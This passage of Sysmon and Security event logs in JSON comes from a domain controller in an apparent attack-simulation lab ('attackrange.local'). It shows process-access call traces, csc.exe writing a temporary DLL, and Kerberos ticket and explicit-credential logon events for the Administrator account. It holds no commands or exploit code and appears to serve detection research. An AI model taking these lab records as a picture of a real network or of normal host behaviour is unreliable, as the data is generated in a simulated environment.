RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:21.151\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nProcessId: 4856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.dll\r\nCreationUtcTime: 2020-08-01 06:55:21.042","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:21.151","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.dll","CreationUtcTime":"2020-08-01 06:55:21.042","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220639,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220640,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220641,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
